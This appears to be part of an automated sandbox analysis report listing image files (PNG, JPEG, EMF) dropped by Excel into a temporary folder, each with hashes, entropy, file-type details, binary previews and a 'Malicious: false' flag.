      Preview: .PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2459FEE9.jpeg
      Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type: JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=2], baseline, precision 8, 474x379, frames 3
      Category: dropped
      Size (bytes): 7006
      Entropy (8bit): 7.000232770071406
      Encrypted: false
      SSDEEP: 96:X/yEpZGOnzVjPyCySpv2oNPl3ygxZzhEahqwKLBpm1hFpn:PyuZbnRW6NPl3yqEhwK1psvn
      MD5: 971312D4A6C9BE9B496160215FE59C19
      SHA1: D8AA41C7D43DAAEA305F50ACF0B34901486438BE
      SHA-256: 4532AEED5A1EB543882653D009593822781976F5959204C87A277887B8DEB961
      SHA-512: 618B55BCD9D9533655C220C71104DFB9E2F712E56CDA7A4D3968DE45EE1861267C2D31CF74C195BF259A7151FA1F49DF4AD13431151EE28AD1D3065020CE53B5
      Malicious: false
      Reputation: low
      Preview: ......JFIF..............Exif..MM.*......@......../..@..................C...........................$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=...C...........=)#)==================================================......{...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..Z(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(..
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\31B846BE.jpeg
      Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type: JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=2], baseline, precision 8, 474x379, frames 3
      Category: dropped
      Size (bytes): 7006
      Entropy (8bit): 7.000232770071406
      Encrypted: false
      SSDEEP: 96:X/yEpZGOnzVjPyCySpv2oNPl3ygxZzhEahqwKLBpm1hFpn:PyuZbnRW6NPl3yqEhwK1psvn
      MD5: 971312D4A6C9BE9B496160215FE59C19
      SHA1: D8AA41C7D43DAAEA305F50ACF0B34901486438BE
      SHA-256: 4532AEED5A1EB543882653D009593822781976F5959204C87A277887B8DEB961
      SHA-512: 618B55BCD9D9533655C220C71104DFB9E2F712E56CDA7A4D3968DE45EE1861267C2D31CF74C195BF259A7151FA1F49DF4AD13431151EE28AD1D3065020CE53B5
      Malicious: false
      Reputation: low
      Preview: ......JFIF..............Exif..MM.*......@......../..@..................C...........................$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=...C...........=)#)==================================================......{...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..Z(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(..
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3F47FD52.emf
      Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type: Windows Enhanced Metafile (EMF) image data version 0x10000
      Category: dropped
      Size (bytes): 648132
      Entropy (8bit): 2.8123883877939457
      Encrypted: false
      SSDEEP: 3072:j34UL0tS6WB0JOqFB5AEA7rgXuzqn8nG/qc+5:L4UcLe0JOcXuunhqcS
      MD5: 62E3F94AAC964ECB9508782BDAC02CD0
      SHA1: BA8AE2F6307F62243DED764BA344536FD28FEC07
      SHA-256: A3CEB693C1517EE4354D33B61AAD28FF47F05285AB12D3C3B0472EE6D8DFDCCC
      SHA-512: 83682C424FD47301012119BB93F735481BFB06B6DE4C3B652EBD6C1159C43EDE013E0E45076DBC23BB19FD5A1EFF663E081EA1C93E7E47D0279FDA0789184A7B
      Malicious: false
      Reputation: low
      Preview: ....l...........................m>...!.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i......................................................X$......-z.X.@..%.............X......N6ZX..P.........<...N6ZX..P.. ....y.XP..X.. .........&..z.X............O...........................%...X...%...7...................{$..................C.a.l.i.b.r.i..............X...P...........&....vdv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@............L.......................P... .x.6...F...$.......EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3FB96E45.png
      Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type: PNG image data, 687 x 111, 8-bit colormap, non-interlaced
      Category: dropped
      Size (bytes): 2493
      Entropy (8bit): 7.758903050821124
      Encrypted: false
      SSDEEP: 48:F9quw7IIfnKFZR4r5vB4FRLiWWl4sXhGI4Y9E5ZBZ7CK0lrC:nQHO34r5vB4F7Wu6zGXZG/pC
      MD5: A5D66CCBEE7946308A985B0FA9CC74F7
      SHA1: D86FFD2A310B16C59849B8E574B673E36643FDDF
      SHA-256: 6B8E5D3AFEA87B138C1084837085EDFF6D74B5001E92897CE6FF087058204B28
      SHA-512: 7C65B24A8A88B88831CCF9089B89946FCC26748DB226488155899D73F7B63EAF32424432A66D78B385DED8381A66E2207EE6BF197D6BC550DDD222D323B73D98
      Malicious: false
      Reputation: moderate, very likely benign file
      Preview: .PNG........IHDR.......o........2...qPLTE.............x.....`.5......5...``.......5..........`.......f.:.5..5.`.`...5..._...55........t.`.`......``4.....Z...U...\.9Z.3f...c.....n..X..N.44....f..:...\...`...:.f..f.:......<v......e:......d5.`.f..\....`````5444\..Z...........Z.....3...4_.78..8.f.f.45..3.5.........3....-l..Z.:.....:.:\.......4..]4..3..7c[._ff:.::.955....:..:.....d3ZZ:::.`5.U......IDATx...=O.P..an.p'.s.q0 I[5....c`.d.....t..{zhm...-.$...@.....q....K....+,.WXB...^a....z...=.z.F...X.E7....(.:.{...px...W..^..N..g....S.c...r.W.CK.s...[*Kv.-5..^.:.f..^.../..BQ....H.~H...[.v./f..y.e..Y.Y.}.CB...`..6{...mz..J.z.O../.m&uV......y._...g)...^..|..Zl..2>.M..c...<..h..~...^..<....i.K..-|.........[A.Ke....sT..H..Z..y`..+v..Vp...U..H6z..J........._...,.S.....t...[..^a....z.%..K....+,.WXB...^a.................`.....Kq7..w....\...'..'....b.......Q#.j.!.,.c..#A..J..^..P%J..^.m.K.=..w.<..k.,..>..w=.v...Y...........&......r.kX-.%6.S..U.B.|........0.
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\48845B4D.png
      Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type: PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
      Category: dropped
      Size (bytes): 84203
      Entropy (8bit): 7.979766688932294
      Encrypted: false
      SSDEEP: 1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
      MD5: 208FD40D2F72D9AED77A86A44782E9E2
      SHA1: 216B99E777ED782BDC3BFD1075DB90DFDDABD20F
      SHA-256: CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
      SHA-512: 7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
      Malicious: false
      Preview: .PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u|0a.....].R.z...2......GJY|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..|...=.|K...w...}O..{|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..|j.....b.r7.O!F...c'......$...)....|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq|.0...e.v......17...:F
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\542157E3.jpeg
      Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type: JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
      Category: dropped
      Size (bytes): 85020
      Entropy (8bit): 7.2472785111025875
      Encrypted: false
      SSDEEP: 768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
      MD5: 738BDB90A9D8929A5FB2D06775F3336F
      SHA1: 6A92C54218BFBEF83371E825D6B68D4F896C0DCE
      SHA-256: 8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
      SHA-512: 48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
      Malicious: false
      Preview: ......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\559E50EA.png
      Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type: PNG image data, 687 x 111, 8-bit colormap, non-interlaced
      Category: dropped
      Size (bytes): 2493
      Entropy (8bit): 7.758903050821124
      Encrypted: false
      SSDEEP: 48:F9quw7IIfnKFZR4r5vB4FRLiWWl4sXhGI4Y9E5ZBZ7CK0lrC:nQHO34r5vB4F7Wu6zGXZG/pC
      MD5: A5D66CCBEE7946308A985B0FA9CC74F7
      SHA1: D86FFD2A310B16C59849B8E574B673E36643FDDF
      SHA-256: 6B8E5D3AFEA87B138C1084837085EDFF6D74B5001E92897CE6FF087058204B28
      SHA-512: 7C65B24A8A88B88831CCF9089B89946FCC26748DB226488155899D73F7B63EAF32424432A66D78B385DED8381A66E2207EE6BF197D6BC550DDD222D323B73D98
      Malicious: false
      Preview: .PNG........IHDR.......o........2...qPLTE.............x.....`.5......5...``.......5..........`.......f.:.5..5.`.`...5..._...55........t.`.`......``4.....Z...U...\.9Z.3f...c.....n..X..N.44....f..:...\...`...:.f..f.:......<v......e:......d5.`.f..\....`````5444\..Z...........Z.....3...4_.78..8.f.f.45..3.5.........3....-l..Z.:.....:.:\.......4..]4..3..7c[._ff:.::.955....:..:.....d3ZZ:::.`5.U......IDATx...=O.P..an.p'.s.q0 I[5....c`.d.....t..{zhm...-.$...@.....q....K....+,.WXB...^a....z...=.z.F...X.E7....(.:.{...px...W..^..N..g....S.c...r.W.CK.s...[*Kv.-5..^.:.f..^.../..BQ....H.~H...[.v./f..y.e..Y.Y.}.CB...`..6{...mz..J.z.O../.m&uV......y._...g)...^..|..Zl..2>.M..c...<..h..~...^..<....i.K..-|.........[A.Ke....sT..H..Z..y`..+v..Vp...U..H6z..J........._...,.S.....t...[..^a....z.%..K....+,.WXB...^a.................`.....Kq7..w....\...'..'....b.......Q#.j.!.,.c..#A..J..^..P%J..^.m.K.=..w.<..k.,..>..w=.v...Y...........&......r.kX-.%6.S..U.B.|........0.
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\67F6771.png
      Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type: PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
      Category: dropped
      Size (bytes): 11303
      Entropy (8bit): 7.909402464702408
      Encrypted: false
      SSDEEP: 192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
      MD5: 9513E5EF8DDC8B0D9C23C4DFD4AEECA2
      SHA1: E7FC283A9529AA61F612EC568F836295F943C8EC
      SHA-256: 88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
      SHA-512: 81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
      Malicious: false
      Preview: .PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6D991930.jpeg
      Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type: JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
      Category: dropped
      Size (bytes): 85020
      Entropy (8bit): 7.2472785111025875
      Encrypted: false
      SSDEEP: 768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
      MD5: 738BDB90A9D8929A5FB2D06775F3336F
      SHA1: 6A92C54218BFBEF83371E825D6B68D4F896C0DCE
      SHA-256: 8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
      SHA-512: 48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
      Malicious: false
      Preview: ......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\91669DF.png
      Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type: PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
      Category: dropped
      Size (bytes): 49744
      Entropy (8bit): 7.99056926749243
      Encrypted: true
      SSDEEP: 768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
      MD5: 63A6CB15B2B8ECD64F1158F5C8FBDCC8
      SHA1: 8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
      SHA-256: AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
      SHA-512: BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
      Malicious: false
      Preview: .PNG........IHDR..............I.M....IDATx....T.]...G.;..nuww7.s...U..K......Ih....q!i...K....t.'k.W..i..>.......B.....E.0....f.a.....e....++...P..|..^...L.S}r:..............sM....p..p-..y]...t7'.D)....../...k....pzos.......6;,..H.....U..a..9..1...$......*.kI<..\F...$.E....?[B(.9.....H..!.....0AV..g.m...23..C..g(.%...6..>.O.r...L..t1.Q-.bE......)........|i ..."....V.g.\.G..p..p.X[.....*%hyt...@..J...~.p.....|..>...~.`..E_...*.iU.G...i.O..r6...iV.....@..........Jte...5Q.P.v;..B.C...m......0.N......q...b.....Q...c.moT.e6OB...p.v"...."........9..G....B}...../m...0g...8......6.$.$]p...9.....Z.a.sr.;B.a....m...>...b..B..K...{...+w?....B3...2...>.......1..-.'.l.p........L....\.K..P.q......?>..fd.`w*..y..|y..,.....i..'&.?.....).e.D ?.06......U.%.2t........6.:..D.B....+~.....M%".fG]b\.[........1....".......GC6.....J.+......r.a...ieZ..j.Y...3..Q*m.r.urb.5@.e.v@@....gsb.{q-..3j........s.f.|8s$p.?3H......0`..6)...bD....^..+....9..;$...W::.jBH..!tK
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\97BC617C.png
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
      Category:dropped
      Size (bytes):49744
      Entropy (8bit):7.99056926749243
      Encrypted:true
      SSDEEP:768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
      MD5:63A6CB15B2B8ECD64F1158F5C8FBDCC8
      SHA1:8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
      SHA-256:AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
      SHA-512:BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
      Malicious:false
      Preview: .PNG........IHDR..............I.M....IDATx....T.]...G.;..nuww7.s...U..K......Ih....q!i...K....t.'k.W..i..>.......B.....E.0....f.a.....e....++...P..|..^...L.S}r:..............sM....p..p-..y]...t7'.D)....../...k....pzos.......6;,..H.....U..a..9..1...$......*.kI<..\F...$.E....?[B(.9.....H..!.....0AV..g.m...23..C..g(.%...6..>.O.r...L..t1.Q-.bE......)........|i ..."....V.g.\.G..p..p.X[.....*%hyt...@..J...~.p.....|..>...~.`..E_...*.iU.G...i.O..r6...iV.....@..........Jte...5Q.P.v;..B.C...m......0.N......q...b.....Q...c.moT.e6OB...p.v"...."........9..G....B}...../m...0g...8......6.$.$]p...9.....Z.a.sr.;B.a....m...>...b..B..K...{...+w?....B3...2...>.......1..-.'.l.p........L....\.K..P.q......?>..fd.`w*..y..|y..,.....i..'&.?.....).e.D ?.06......U.%.2t........6.:..D.B....+~.....M%".fG]b\.[........1....".......GC6.....J.+......r.a...ieZ..j.Y...3..Q*m.r.urb.5@.e.v@@....gsb.{q-..3j........s.f.|8s$p.?3H......0`..6)...bD....^..+....9..;$...W::.jBH..!tK
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\98E3C7D6.png
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PNG image data, 779 x 181, 8-bit colormap, non-interlaced
      Category:dropped
      Size (bytes):5842
      Entropy (8bit):7.92185581034873
      Encrypted:false
      SSDEEP:96:+Q9KyOE9ulJ01zAcTCcAZd+0Mvin1EFi0sAMcNV99iyysx8JXmaaINsWHfjMzNzl:4yvmJ0VmQE/Ovi0aa5EMzNzl
      MD5:871E67261292737F85DEE051B2EF5B1A
      SHA1:3108E69E8BEABB0CD820696E9F22889B5E7D3224
      SHA-256:F35AAA75635EB695B2DA69C932ECBD5AD4DB934EBFB0433DAC7913C2B7551A6A
      SHA-512:3C0CC7DF2D5080166C1C35C0D120CA686A8EF09348AB0F28CE6859FEC9F7DD3AB16955D79E1C092A5D78666FAE978F69E632D9FB307776E69FD586ADA605FEAF
      Malicious:false
      Preview: .PNG........IHDR.............'P......gAMA......a.....sRGB.........pHYs..........o.d....PLTE...............LLL.....................................................................ppp......`.6................?.6.._...`Bi...Y..f...%E........_...5DG....._.tNq.8.6..<?.....5...PVj..X.1...4U..._z..ANTT.b...kt..zZ5...........__..........~.......ff`.........H#....DIDATx..[.[....R..lK.|....E*........P.....sz...3..I...X#.....ffwv...n...~:.X...E}......\`}.g..>.3.X........r!.`.:..B8\.f0f....lx4..7s.o....F.&..\............s!\........o.....Ssa....1.X.<9."sso...G.\XX..q.2.....D@.0...".'.'/0.......K.px......X.....`......iD..c.-.....J//.o.,....<......9m). ..R...@'..q.y....N..&$...v94.q..<.w.\.P......f_.... ...B.0}o.....y......l.Z..PzRb..F.....[..)..........J,....B....t(..BR...w .Q...S...H...{.....7P........o...Ol..fV.\.........}.......A'.g.:E.7.u.........|.5pDj..f0.E:n..'. .....E..j^..tp\H;....3...C\..u.e..P.{...6.9....".6M....K..".F.D.a0.....|>.T...x.Yj....C".
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A298892B.emf
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
      Category:dropped
      Size (bytes):7608
      Entropy (8bit):5.0774464665993575
      Encrypted:false
      SSDEEP:96:+Sc4AAjL6BGj/MQU8DbwiMOtWmVz76F2MqdTfOYL/xRp7uGkmrI:5cqjU+H3tWa6WdTfOYLpR8d
      MD5:70A88C1226FC889154191297A4A09A2F
      SHA1:03234CA14006B1F4C1A45A06BD4BE69E7B2B70EC
      SHA-256:BEE993BAEB024759B6F3DB327531AAB552A87B79B3FE112E311AEF9D9FE0A3CF
      SHA-512:655CF38CC37DBA421408536253142E347644D542E475464D867466044FF521523EE66FE0E4F7BAC960DBB795C8DBD00E2DFBB7C8D675E68131F52415B6AC81F5
      Malicious:false
      Preview: ....l...,...........<................... EMF................................8...X....................?..................................C...R...p...................................S.e.g.o.e. .U.I...................................................j.6.).X.......d......................P.....p....\...................p........6Pv...p....`..pxij.$y.v..................v....$.......d.......4...^.p.....^.p........P.{.....-.......<.v................<.>v.Z.v....X.a....xij........................vdv......%...................................r...................'...........(...(..................?...........?................l...4...........(...(...(...(...(..... .............................................................................................................................................................................................................................................................................................................................................
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BB193A54.png
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):84203
      Entropy (8bit):7.979766688932294
      Encrypted:false
      SSDEEP:1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
      MD5:208FD40D2F72D9AED77A86A44782E9E2
      SHA1:216B99E777ED782BDC3BFD1075DB90DFDDABD20F
      SHA-256:CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
      SHA-512:7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
      Malicious:false
      Preview: .PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u|0a.....].R.z...2......GJY|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..|...=.|K...w...}O..{|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..|j.....b.r7.O!F...c'......$...)....|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq|.0...e.v......17...:F
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DB194BA7.png
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PNG image data, 779 x 181, 8-bit colormap, non-interlaced
      Category:dropped
      Size (bytes):5842
      Entropy (8bit):7.92185581034873
      Encrypted:false
      SSDEEP:96:+Q9KyOE9ulJ01zAcTCcAZd+0Mvin1EFi0sAMcNV99iyysx8JXmaaINsWHfjMzNzl:4yvmJ0VmQE/Ovi0aa5EMzNzl
      MD5:871E67261292737F85DEE051B2EF5B1A
      SHA1:3108E69E8BEABB0CD820696E9F22889B5E7D3224
      SHA-256:F35AAA75635EB695B2DA69C932ECBD5AD4DB934EBFB0433DAC7913C2B7551A6A
      SHA-512:3C0CC7DF2D5080166C1C35C0D120CA686A8EF09348AB0F28CE6859FEC9F7DD3AB16955D79E1C092A5D78666FAE978F69E632D9FB307776E69FD586ADA605FEAF
      Malicious:false
